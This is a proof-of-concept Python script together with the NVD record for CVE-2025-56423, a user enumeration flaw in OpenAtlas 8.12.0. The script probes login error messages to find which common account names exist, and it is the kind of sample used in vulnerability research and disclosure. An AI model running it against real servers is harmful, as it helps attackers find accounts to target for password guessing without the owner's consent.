CVE-2025-56423

import requests import sys # CVE-2025-56423 PoC - OpenAtlas User Enumeration # Target: OpenAtlas v.8.12.0 # Vulnerability: User enumeration via login error messages def check_user_exists(target_url, username): """ Check if a username exists by analyzing login error messages """ login_url = f"{target_url}/user/login" # Adjust endpoint as needed # Try with a random password data = { 'username': username, 'password': 'random_wrong_password_123' } try: response = requests.post(login_url, data=data, timeout=10) content = response.text.lower() # Analyze error messages to determine if user exists # Different error messages indicate user existence if 'user not found' in content or 'username does not exist' in content: return False # User does not exist elif 'incorrect password' in content or 'wrong password' in content: return True # User exists (password is wrong) else: # If messages are consistent, user enumeration may not be possible return None except requests.exceptions.RequestException as e: print(f"Error: {e}") return None def main(): if len(sys.argv) != 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://target.com") sys.exit(1) target = sys.argv[1] usernames = ['admin', 'user', 'test', 'administrator', 'guest'] print(f"[*] Scanning {target} for valid usernames...") print("-" * 50) found_users = [] for user in usernames: result = check_user_exists(target, user) if result is True: print(f"[+] User found: {user}") found_users.append(user) elif result is False: print(f"[-] User not found: {user}") print("-" * 50) if found_users: print(f"[*] Found {len(found_users)} valid user(s): {', '.join(found_users)}") else: print("[*] No valid users found") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-56423", "sourceIdentifier": "[email protected]", "published": "2025-11-24T16:15:49.680", "lastModified": "2025-11-28T16:22:11.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in Austrian Academy of Sciences (AW) Austrian Archaeological Institute OpenAtlas v.8.12.0 allows a remote attacker to obtain sensitive information via the login error messages"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-203"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:craws:openatlas:*:*:*:*:*:*:*:*", "versionEndExcluding": "8.12.1", "matchCriteriaId": "67DB1F41-979F-4E4E-862D-EA9C1CF3F086"}]}]}], "references": [{"url": "https://www.sec4you-pentest.com/schwachstelle/openatlas-schwachstelle-user-enumeration/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.sec4you-pentest.com/schwachstellen/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}